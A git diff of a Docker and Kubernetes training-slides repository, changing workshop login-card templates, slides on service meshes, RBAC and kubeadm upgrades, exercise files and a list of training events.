{% for node in cluster %}
|
||||
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
<p>You can find the slides at:
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
@@ -1,121 +0,0 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://FIXME.container.training" -%}
|
||||
{%- set pagesize = 9 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine virtuelle" -%}
|
||||
{%- set this_or_each = "cette" -%}
|
||||
{%- set plural = "" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "Kubernetes workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "chaque" -%}
|
||||
{%- set plural = "s" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_kube -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
|
||||
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1em;
|
||||
font-size: 15px;
|
||||
font-family: 'Slabo 27px';
|
||||
}
|
||||
|
||||
table {
|
||||
border-spacing: 0;
|
||||
margin-top: 0.4em;
|
||||
margin-bottom: 0.4em;
|
||||
border-left: 0.8em double grey;
|
||||
padding-left: 0.4em;
|
||||
}
|
||||
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
width: 30%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.4em 0 0.4em 0;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 4em;
|
||||
float: right;
|
||||
margin-right: -0.3em;
|
||||
}
|
||||
|
||||
img.enix {
|
||||
height: 4.0em;
|
||||
margin-top: 0.4em;
|
||||
}
|
||||
|
||||
img.kube {
|
||||
height: 4.2em;
|
||||
margin-top: 1.7em;
|
||||
}
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.pagebreak {
|
||||
page-break-after: always;
|
||||
clear: both;
|
||||
display: block;
|
||||
height: 8px;
|
||||
}
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
{% if loop.index0>0 and loop.index0%pagesize==0 %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
<div>
|
||||
|
||||
<p>
|
||||
Voici les informations permettant de se connecter à votre
|
||||
{{ cluster_or_machine }} pour cette formation.
|
||||
Vous pouvez vous connecter à {{ this_or_each }} machine virtuelle
|
||||
avec n'importe quel client SSH.
|
||||
</p>
|
||||
<p>
|
||||
<img class="enix" src="https://enix.io/static/img/logos/logo-domain-cropped.png" />
|
||||
<table>
|
||||
<tr><td>identifiant:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>mot de passe:</td></tr>
|
||||
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
|
||||
</table>
|
||||
|
||||
</p>
|
||||
<p>
|
||||
Adresse{{ plural }} IP :
|
||||
<!--<img class="kube" src="{{ image_src }}" />-->
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
<p>Le support de formation est à l'adresse suivante :
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
@@ -1,15 +1,14 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://qconuk2019.container.training/" -%}
|
||||
{%- set url = "http://wwrk-2019-05.container.training/" -%}
|
||||
{%- set pagesize = 9 -%}
|
||||
{%- set workshop_name = "training session" -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine" -%}
|
||||
{%- set cluster_or_machine = "Docker machine" -%}
|
||||
{%- set this_or_each = "this" -%}
|
||||
{%- set machine_is_or_machines_are = "machine is" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "Kubernetes workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set cluster_or_machine = "Kubernetes cluster" -%}
|
||||
{%- set this_or_each = "each" -%}
|
||||
{%- set machine_is_or_machines_are = "machines are" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
@@ -109,26 +108,6 @@ img {
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% if loop.index%pagesize==0 or loop.last %}
|
||||
<span class="pagebreak"></span>
|
||||
{% for x in range(pagesize) %}
|
||||
<div class="back">
|
||||
<br/>
|
||||
<p>You got this at the workshop
|
||||
"Getting Started With Kubernetes and Container Orchestration"
|
||||
during QCON London (March 2019).</p>
|
||||
<p>If you liked that workshop,
|
||||
I can train your team or organization
|
||||
on Docker, container, and Kubernetes,
|
||||
with curriculums of 1 to 5 days.
|
||||
</p>
|
||||
<p>Interested? Contact me at:</p>
|
||||
<p>jerome.petazzoni@gmail.com</p>
|
||||
<p>Thank you!</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
|
||||
@@ -1,106 +0,0 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://container.training/" -%}
|
||||
{%- set pagesize = 12 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine" -%}
|
||||
{%- set this_or_each = "this" -%}
|
||||
{%- set machine_is_or_machines_are = "machine is" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "Kubernetes workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "each" -%}
|
||||
{%- set machine_is_or_machines_are = "machines are" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_kube -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1em;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
table {
|
||||
border-spacing: 0;
|
||||
margin-top: 0.4em;
|
||||
margin-bottom: 0.4em;
|
||||
border-left: 0.8em double grey;
|
||||
padding-left: 0.4em;
|
||||
}
|
||||
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
width: 21.5%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.4em 0 0.4em 0;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 4em;
|
||||
float: right;
|
||||
margin-right: -0.4em;
|
||||
}
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.pagebreak {
|
||||
page-break-after: always;
|
||||
clear: both;
|
||||
display: block;
|
||||
height: 8px;
|
||||
}
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
{% if loop.index0>0 and loop.index0%pagesize==0 %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
<div>
|
||||
|
||||
<p>
|
||||
Here is the connection information to your very own
|
||||
{{ cluster_or_machine }} for this {{ workshop_name }}.
|
||||
You can connect to {{ this_or_each }} VM with any SSH client.
|
||||
</p>
|
||||
<p>
|
||||
<img src="{{ image_src }}" />
|
||||
<table>
|
||||
<tr><td>login:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>password:</td></tr>
|
||||
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
|
||||
</table>
|
||||
|
||||
</p>
|
||||
<p>
|
||||
Your {{ machine_is_or_machines_are }}:
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
<p>You can find the slides at:
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
@@ -2,4 +2,4 @@
|
||||
#/ /kube-halfday.yml.html 200
|
||||
#/ /kube-fullday.yml.html 200
|
||||
#/ /kube-twodays.yml.html 200
|
||||
/ /kube-admin-one.yml.html 200!
|
||||
/ /wwrk.yml.html 200!
|
||||
|
||||
@@ -186,22 +186,48 @@ Different deployments will use different underlying technologies.
|
||||
|
||||
---
|
||||
|
||||
## Section summary
|
||||
## Some popular service meshes
|
||||
|
||||
We've learned how to:
|
||||
... And related projects:
|
||||
|
||||
* Understand the ambassador pattern and what it is used for (service portability).
|
||||
|
||||
For more information about the ambassador pattern, including demos on Swarm and ECS:
|
||||
|
||||
* AWS re:invent 2015 [DVO317](https://www.youtube.com/watch?v=7CZFpHUPqXw)
|
||||
|
||||
* [SwarmWeek video about Swarm+Compose](https://youtube.com/watch?v=qbIvUvwa6As)
|
||||
|
||||
Some services meshes and related projects:
|
||||
|
||||
* [Istio](https://istio.io/)
|
||||
|
||||
* [Linkerd](https://linkerd.io/)
|
||||
* [Consul Connect](https://www.consul.io/docs/connect/index.html)
|
||||
<br/>
|
||||
Transparently secures service-to-service connections with mTLS.
|
||||
|
||||
* [Gloo](https://gloo.solo.io/)
|
||||
<br/>
|
||||
API gateway that can interconnect applications on VMs, containers, and serverless.
|
||||
|
||||
* [Istio](https://istio.io/)
|
||||
<br/>
|
||||
A popular service mesh.
|
||||
|
||||
* [Linkerd](https://linkerd.io/)
|
||||
<br/>
|
||||
Another popular service mesh.
|
||||
|
||||
---
|
||||
|
||||
## Learning more about service meshes
|
||||
|
||||
A few blog posts about service meshes:
|
||||
|
||||
* [Containers, microservices, and service meshes](http://jpetazzo.github.io/2019/05/17/containers-microservices-service-meshes/)
|
||||
<br/>
|
||||
Provides historical context: how did we do before service meshes were invented?
|
||||
|
||||
* [Do I Need a Service Mesh?](https://www.nginx.com/blog/do-i-need-a-service-mesh/)
|
||||
<br/>
|
||||
Explains the purpose of service meshes. Illustrates some NGINX features.
|
||||
|
||||
* [Do you need a service mesh?](https://www.oreilly.com/ideas/do-you-need-a-service-mesh)
|
||||
<br/>
|
||||
Includes high-level overview and definitions.
|
||||
|
||||
* [What is Service Mesh and Why Do We Need It?](https://containerjournal.com/2018/12/12/what-is-service-mesh-and-why-do-we-need-it/)
|
||||
<br/>
|
||||
Includes a step-by-step demo of Linkerd.
|
||||
|
||||
And a video:
|
||||
|
||||
* [What is a Service Mesh, and Do I Need One When Developing Microservices?](https://www.datawire.io/envoyproxy/service-mesh/)
|
||||
|
||||
@@ -528,7 +528,9 @@ Very short instructions:
|
||||
- `docker network create mynet --driver overlay`
|
||||
- `docker service create --network mynet myimage`
|
||||
|
||||
See https://jpetazzo.github.io/container.training for all the deets about clustering!
|
||||
If you want to learn more about Swarm mode, you can check
|
||||
[this video](https://www.youtube.com/watch?v=EuzoEaE6Cqs)
|
||||
or [these slides](https://container.training/swarm-selfpaced.yml.html).
|
||||
|
||||
---
|
||||
|
||||
|
||||
5
slides/containers/Exercise_Composefile.md
Normal file
@@ -0,0 +1,5 @@
|
||||
# Exercise — writing a Compose file
|
||||
|
||||
Let's write a Compose file for the wordsmith app!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
9
slides/containers/Exercise_Dockerfile_Advanced.md
Normal file
@@ -0,0 +1,9 @@
|
||||
# Exercise — writing better Dockerfiles
|
||||
|
||||
Let's update our Dockerfiles to leverage multi-stage builds!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
|
||||
Use a different tag for these images, so that we can compare their sizes.
|
||||
|
||||
What's the size difference between single-stage and multi-stage builds?
|
||||
5
slides/containers/Exercise_Dockerfile_Basic.md
Normal file
@@ -0,0 +1,5 @@
|
||||
# Exercise — writing Dockerfiles
|
||||
|
||||
Let's write Dockerfiles for an existing application!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
@@ -203,4 +203,90 @@ bash: figlet: command not found
|
||||
|
||||
* The basic Ubuntu image was used, and `figlet` is not here.
|
||||
|
||||
* We will see in the next chapters how to bake a custom image with `figlet`.
|
||||
---
|
||||
|
||||
## Where's my container?
|
||||
|
||||
* Can we reuse that container that we took time to customize?
|
||||
|
||||
*We can, but that's not the default workflow with Docker.*
|
||||
|
||||
* What's the default workflow, then?
|
||||
|
||||
*Always start with a fresh container.*
|
||||
<br/>
|
||||
*If we need something installed in our container, build a custom image.*
|
||||
|
||||
* That seems complicated!
|
||||
|
||||
*We'll see that it's actually pretty easy!*
|
||||
|
||||
* And what's the point?
|
||||
|
||||
*This puts a strong emphasis on automation and repeatability. Let's see why ...*
|
||||
|
||||
---
|
||||
|
||||
## Pets vs. Cattle
|
||||
|
||||
* In the "pets vs. cattle" metaphor, there are two kinds of servers.
|
||||
|
||||
* Pets:
|
||||
|
||||
* have distinctive names and unique configurations
|
||||
|
||||
* when they have an outage, we do everything we can to fix them
|
||||
|
||||
* Cattle:
|
||||
|
||||
* have generic names (e.g. with numbers) and generic configuration
|
||||
|
||||
* configuration is enforced by configuration management, golden images ...
|
||||
|
||||
* when they have an outage, we can replace them immediately with a new server
|
||||
|
||||
* What's the connection with Docker and containers?
|
||||
|
||||
---
|
||||
|
||||
## Local development environments
|
||||
|
||||
* When we use local VMs (with e.g. VirtualBox or VMware), our workflow looks like this:
|
||||
|
||||
* create VM from base template (Ubuntu, CentOS...)
|
||||
|
||||
* install packages, set up environment
|
||||
|
||||
* work on project
|
||||
|
||||
* when done, shutdown VM
|
||||
|
||||
* next time we need to work on project, restart VM as we left it
|
||||
|
||||
* if we need to tweak the environment, we do it live
|
||||
|
||||
* Over time, the VM configuration evolves, diverges.
|
||||
|
||||
* We don't have a clean, reliable, deterministic way to provision that environment.
|
||||
|
||||
---
|
||||
|
||||
## Local development with Docker
|
||||
|
||||
* With Docker, the workflow looks like this:
|
||||
|
||||
* create container image with our dev environment
|
||||
|
||||
* run container with that image
|
||||
|
||||
* work on project
|
||||
|
||||
* when done, shutdown container
|
||||
|
||||
* next time we need to work on project, start a new container
|
||||
|
||||
* if we need to tweak the environment, we create a new image
|
||||
|
||||
* We have a clear definition of our environment, and can share it reliably with others.
|
||||
|
||||
* Let's see in the next chapters how to bake a custom image with `figlet`!
|
||||
|
||||
@@ -70,8 +70,9 @@ class: pic
|
||||
|
||||
* An image is a read-only filesystem.
|
||||
|
||||
* A container is an encapsulated set of processes running in a
|
||||
read-write copy of that filesystem.
|
||||
* A container is an encapsulated set of processes,
|
||||
|
||||
running in a read-write copy of that filesystem.
|
||||
|
||||
* To optimize container boot time, *copy-on-write* is used
|
||||
instead of regular copy.
|
||||
@@ -177,8 +178,11 @@ Let's explain each of them.
|
||||
|
||||
## Root namespace
|
||||
|
||||
The root namespace is for official images. They are put there by Docker Inc.,
|
||||
but they are generally authored and maintained by third parties.
|
||||
The root namespace is for official images.
|
||||
|
||||
They are gated by Docker Inc.
|
||||
|
||||
They are generally authored and maintained by third parties.
|
||||
|
||||
Those images include:
|
||||
|
||||
@@ -188,7 +192,7 @@ Those images include:
|
||||
|
||||
* Ready-to-use components and services, like redis, postgresql...
|
||||
|
||||
* Over 130 at this point!
|
||||
* Over 150 at this point!
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -6,8 +6,6 @@ In this chapter, we will:
|
||||
|
||||
* Present (from a high-level perspective) some orchestrators.
|
||||
|
||||
* Show one orchestrator (Kubernetes) in action.
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
|
||||
1203
slides/images/kubectl-run-slideshow/01.svg
Normal file
|
After Width: | Height: | Size: 82 KiB |
1193
slides/images/kubectl-run-slideshow/02.svg
Normal file
|
After Width: | Height: | Size: 81 KiB |
1203
slides/images/kubectl-run-slideshow/03.svg
Normal file
|
After Width: | Height: | Size: 82 KiB |
1207
slides/images/kubectl-run-slideshow/04.svg
Normal file
|
After Width: | Height: | Size: 82 KiB |
1239
slides/images/kubectl-run-slideshow/05.svg
Normal file
|
After Width: | Height: | Size: 84 KiB |
1209
slides/images/kubectl-run-slideshow/06.svg
Normal file
|
After Width: | Height: | Size: 82 KiB |
1209
slides/images/kubectl-run-slideshow/07.svg
Normal file
|
After Width: | Height: | Size: 82 KiB |
1209
slides/images/kubectl-run-slideshow/08.svg
Normal file
|
After Width: | Height: | Size: 82 KiB |
1209
slides/images/kubectl-run-slideshow/09.svg
Normal file
|
After Width: | Height: | Size: 82 KiB |
1209
slides/images/kubectl-run-slideshow/10.svg
Normal file
|
After Width: | Height: | Size: 82 KiB |
1209
slides/images/kubectl-run-slideshow/11.svg
Normal file
|
After Width: | Height: | Size: 82 KiB |
1209
slides/images/kubectl-run-slideshow/12.svg
Normal file
|
After Width: | Height: | Size: 82 KiB |
1209
slides/images/kubectl-run-slideshow/13.svg
Normal file
|
After Width: | Height: | Size: 82 KiB |
1209
slides/images/kubectl-run-slideshow/14.svg
Normal file
|
After Width: | Height: | Size: 83 KiB |
1209
slides/images/kubectl-run-slideshow/15.svg
Normal file
|
After Width: | Height: | Size: 82 KiB |
1209
slides/images/kubectl-run-slideshow/16.svg
Normal file
|
After Width: | Height: | Size: 82 KiB |
1177
slides/images/kubectl-run-slideshow/17.svg
Normal file
|
After Width: | Height: | Size: 81 KiB |
1177
slides/images/kubectl-run-slideshow/18.svg
Normal file
|
After Width: | Height: | Size: 81 KiB |
1177
slides/images/kubectl-run-slideshow/19.svg
Normal file
|
After Width: | Height: | Size: 81 KiB |
@@ -1,3 +1,37 @@
|
||||
- date: 2019-11-13
|
||||
country: fr
|
||||
city: Marseille
|
||||
event: DevopsDDay
|
||||
speaker: jpetazzo
|
||||
title: Déployer ses applications avec Kubernetes (in French)
|
||||
lang: fr
|
||||
attend: http://2019.devops-dday.com/Workshop.html
|
||||
|
||||
- date: [2019-09-24, 2019-09-25]
|
||||
country: fr
|
||||
city: Paris
|
||||
event: ENIX SAS
|
||||
speaker: jpetazzo
|
||||
title: Déployer ses applications avec Kubernetes (in French)
|
||||
lang: fr
|
||||
attend: https://enix.io/fr/services/formation/deployer-ses-applications-avec-kubernetes/
|
||||
|
||||
- date: 2019-06-17
|
||||
country: ca
|
||||
city: Montréal
|
||||
event: Zenika
|
||||
speaker: jpetazzo
|
||||
title: Getting Started With Kubernetes
|
||||
attend: https://www.eventbrite.com/e/getting-started-with-kubernetes-1-day-en-tickets-61658444066
|
||||
|
||||
- date: [2019-06-10, 2019-06-11]
|
||||
city: San Jose, CA
|
||||
country: us
|
||||
event: Velocity
|
||||
title: Kubernetes for administrators and operators
|
||||
speaker: jpetazzo
|
||||
attend: https://conferences.oreilly.com/velocity/vl-ca/public/schedule/detail/75313
|
||||
|
||||
- date: 2019-05-01
|
||||
country: us
|
||||
city: Cleveland, OH
|
||||
@@ -5,6 +39,8 @@
|
||||
speaker: jpetazzo, s0ulshake
|
||||
title: Getting started with Kubernetes and container orchestration
|
||||
attend: https://us.pycon.org/2019/schedule/presentation/74/
|
||||
slides: https://pycon2019.container.training/
|
||||
video: https://www.youtube.com/watch?v=J08MrW2NC1Y
|
||||
|
||||
- date: 2019-04-28
|
||||
country: us
|
||||
@@ -22,6 +58,7 @@
|
||||
speaker: jpetazzo
|
||||
title: Opérer et administrer Kubernetes
|
||||
attend: https://enix.io/fr/services/formation/operer-et-administrer-kubernetes/
|
||||
slides: https://kadm-2019-04.container.training/
|
||||
|
||||
- date: [2019-04-23, 2019-04-24]
|
||||
country: fr
|
||||
@@ -31,7 +68,7 @@
|
||||
title: Déployer ses applications avec Kubernetes (in French)
|
||||
lang: fr
|
||||
attend: https://enix.io/fr/services/formation/deployer-ses-applications-avec-kubernetes/
|
||||
slides: https://kube-2019-04.container.training
|
||||
slides: https://kube-2019-04.container.training/
|
||||
|
||||
- date: [2019-04-15, 2019-04-16]
|
||||
country: fr
|
||||
|
||||
@@ -30,27 +30,11 @@ chapters:
|
||||
- containers/Building_Images_With_Dockerfiles.md
|
||||
- containers/Cmd_And_Entrypoint.md
|
||||
- - containers/Copying_Files_During_Build.md
|
||||
- |
|
||||
# Exercise — writing Dockerfiles
|
||||
|
||||
Let's write Dockerfiles for an existing application!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
|
||||
- containers/Exercise_Dockerfile_Basic.md
|
||||
- containers/Multi_Stage_Builds.md
|
||||
- containers/Publishing_To_Docker_Hub.md
|
||||
- containers/Dockerfile_Tips.md
|
||||
- |
|
||||
# Exercise — writing better Dockerfiles
|
||||
|
||||
Let's update our Dockerfiles to leverage multi-stage builds!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
|
||||
Use a different tag for these images, so that we can compare their sizes.
|
||||
|
||||
What's the size difference between single-stage and multi-stage builds?
|
||||
|
||||
- containers/Exercise_Dockerfile_Advanced.md
|
||||
- - containers/Naming_And_Inspecting.md
|
||||
- containers/Labels.md
|
||||
- containers/Getting_Inside.md
|
||||
@@ -64,13 +48,7 @@ chapters:
|
||||
- containers/Windows_Containers.md
|
||||
- containers/Working_With_Volumes.md
|
||||
- containers/Compose_For_Dev_Stacks.md
|
||||
- |
|
||||
# Exercise — writing a Compose file
|
||||
|
||||
Let's write a Compose file for the wordsmith app!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
|
||||
- containers/Exercise_Composefile.md
|
||||
- - containers/Docker_Machine.md
|
||||
- containers/Advanced_Dockerfiles.md
|
||||
- containers/Application_Configuration.md
|
||||
|
||||
@@ -30,9 +30,11 @@ chapters:
|
||||
- containers/Building_Images_With_Dockerfiles.md
|
||||
- containers/Cmd_And_Entrypoint.md
|
||||
- containers/Copying_Files_During_Build.md
|
||||
- containers/Exercise_Dockerfile_Basic.md
|
||||
- - containers/Multi_Stage_Builds.md
|
||||
- containers/Publishing_To_Docker_Hub.md
|
||||
- containers/Dockerfile_Tips.md
|
||||
- containers/Exercise_Dockerfile_Advanced.md
|
||||
- - containers/Naming_And_Inspecting.md
|
||||
- containers/Labels.md
|
||||
- containers/Getting_Inside.md
|
||||
@@ -45,6 +47,7 @@ chapters:
|
||||
- containers/Windows_Containers.md
|
||||
- containers/Working_With_Volumes.md
|
||||
- containers/Compose_For_Dev_Stacks.md
|
||||
- containers/Exercise_Composefile.md
|
||||
- containers/Docker_Machine.md
|
||||
- - containers/Advanced_Dockerfiles.md
|
||||
- containers/Application_Configuration.md
|
||||
|
||||
@@ -143,19 +143,21 @@ class: extra-details
|
||||
|
||||
(see issue [#18982](https://github.com/kubernetes/kubernetes/issues/18982))
|
||||
|
||||
- As a result, we cannot easily suspend a user's access
|
||||
- As a result, we don't have an easy way to terminate someone's access
|
||||
|
||||
- There are workarounds, but they are very inconvenient:
|
||||
(if their key is compromised, or they leave the organization)
|
||||
|
||||
- issue short-lived certificates (e.g. 24 hours) and regenerate them often
|
||||
- Option 1: re-create a new CA and re-issue everyone's certificates
|
||||
<br/>
|
||||
→ Maybe OK if we only have a few users; no way otherwise
|
||||
|
||||
- re-create the CA and re-issue all certificates in case of compromise
|
||||
- Option 2: don't use groups; grant permissions to individual users
|
||||
<br/>
|
||||
→ Inconvenient if we have many users and teams; error-prone
|
||||
|
||||
- grant permissions to individual users, not groups
|
||||
<br/>
|
||||
(and remove all permissions to a compromised user)
|
||||
|
||||
- Until this is fixed, we probably want to use other methods
|
||||
- Option 3: issue short-lived certificates (e.g. 24 hours) and renew them often
|
||||
<br/>
|
||||
→ This can be facilitated by e.g. Vault or by the Kubernetes CSR API
|
||||
|
||||
---
|
||||
|
||||
@@ -407,7 +409,7 @@ class: extra-details
|
||||
|
||||
- We are going to create a service account
|
||||
|
||||
- We will use an existing cluster role (`view`)
|
||||
- We will use a default cluster role (`view`)
|
||||
|
||||
- We will bind together this role and this service account
|
||||
|
||||
@@ -574,6 +576,51 @@ It's important to note a couple of details in these flags ...
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Where does this `view` role come from?
|
||||
|
||||
- Kubernetes defines a number of ClusterRoles intended to be bound to users
|
||||
|
||||
- `cluster-admin` can do *everything* (think `root` on UNIX)
|
||||
|
||||
- `admin` can do *almost everything* (except e.g. changing resource quotas and limits)
|
||||
|
||||
- `edit` is similar to `admin`, but cannot view or edit permissions
|
||||
|
||||
- `view` has read-only access to most resources, except permissions and secrets
|
||||
|
||||
*In many situations, these roles will be all you need.*
|
||||
|
||||
*You can also customize them if needed!*
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Customizing the default roles
|
||||
|
||||
- If you need to *add* permissions to these default roles (or others),
|
||||
<br/>
|
||||
you can do it through the [ClusterRole Aggregation](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#aggregated-clusterroles) mechanism
|
||||
|
||||
- This happens by creating a ClusterRole with the following labels:
|
||||
```yaml
|
||||
metadata:
|
||||
labels:
|
||||
rbac.authorization.k8s.io/aggregate-to-admin: "true"
|
||||
rbac.authorization.k8s.io/aggregate-to-edit: "true"
|
||||
rbac.authorization.k8s.io/aggregate-to-view: "true"
|
||||
```
|
||||
|
||||
- This ClusterRole permissions will be added to `admin`/`edit`/`view` respectively
|
||||
|
||||
- This is particulary useful when using CustomResourceDefinitions
|
||||
|
||||
(since Kubernetes cannot guess which resources are sensitive and which ones aren't)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Where do our permissions come from?
|
||||
|
||||
- When interacting with the Kubernetes API, we are using a client certificate
|
||||
|
||||
@@ -166,7 +166,7 @@
|
||||
|
||||
- Upgrade kubelet:
|
||||
```bash
|
||||
apt install kubelet=1.14.1-00
|
||||
apt install kubelet=1.14.2-00
|
||||
```
|
||||
|
||||
]
|
||||
@@ -267,7 +267,7 @@
|
||||
|
||||
- Perform the upgrade:
|
||||
```bash
|
||||
sudo kubeadm upgrade apply v1.14.1
|
||||
sudo kubeadm upgrade apply v1.14.2
|
||||
```
|
||||
|
||||
]
|
||||
@@ -287,8 +287,8 @@
|
||||
- Download the configuration on each node, and upgrade kubelet:
|
||||
```bash
|
||||
for N in 1 2 3; do
|
||||
ssh node$N sudo kubeadm upgrade node config --kubelet-version v1.14.1
|
||||
ssh node $N sudo apt install kubelet=1.14.1-00
|
||||
ssh node$N sudo kubeadm upgrade node config --kubelet-version v1.14.2
|
||||
ssh node $N sudo apt install kubelet=1.14.2-00
|
||||
done
|
||||
```
|
||||
]
|
||||
@@ -297,7 +297,7 @@
|
||||
|
||||
## Checking what we've done
|
||||
|
||||
- All our nodes should now be updated to version 1.14.1
|
||||
- All our nodes should now be updated to version 1.14.2
|
||||
|
||||
.exercise[
|
||||
|
||||
|
||||
@@ -130,6 +130,14 @@ class: pic
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Running the control plane on special nodes
|
||||
|
||||
- It is common to reserve a dedicated node for the control plane
|
||||
@@ -152,6 +160,8 @@ class: pic
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Running the control plane outside containers
|
||||
|
||||
- The services of the control plane can run in or out of containers
|
||||
@@ -171,6 +181,8 @@ class: pic
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Do we need to run Docker at all?
|
||||
|
||||
No!
|
||||
@@ -187,6 +199,8 @@ No!
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Do we need to run Docker at all?
|
||||
|
||||
Yes!
|
||||
@@ -209,6 +223,8 @@ Yes!
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Do we need to run Docker at all?
|
||||
|
||||
- On our development environments, CI pipelines ... :
|
||||
@@ -225,25 +241,21 @@ Yes!
|
||||
|
||||
---
|
||||
|
||||
## Kubernetes resources
|
||||
## Interacting with Kubernetes
|
||||
|
||||
- The Kubernetes API defines a lot of objects called *resources*
|
||||
- We will interact with our Kubernetes cluster through the Kubernetes API
|
||||
|
||||
